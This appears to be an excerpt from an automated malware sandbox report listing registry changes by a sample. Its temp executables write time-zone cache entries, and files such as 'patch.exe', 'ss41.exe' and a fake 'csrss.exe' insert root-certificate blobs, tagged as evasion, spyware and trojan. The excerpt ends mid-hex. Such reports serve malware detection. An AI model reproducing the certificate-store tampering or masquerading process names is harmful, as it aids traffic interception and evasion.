Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\ss41.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\ss41.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e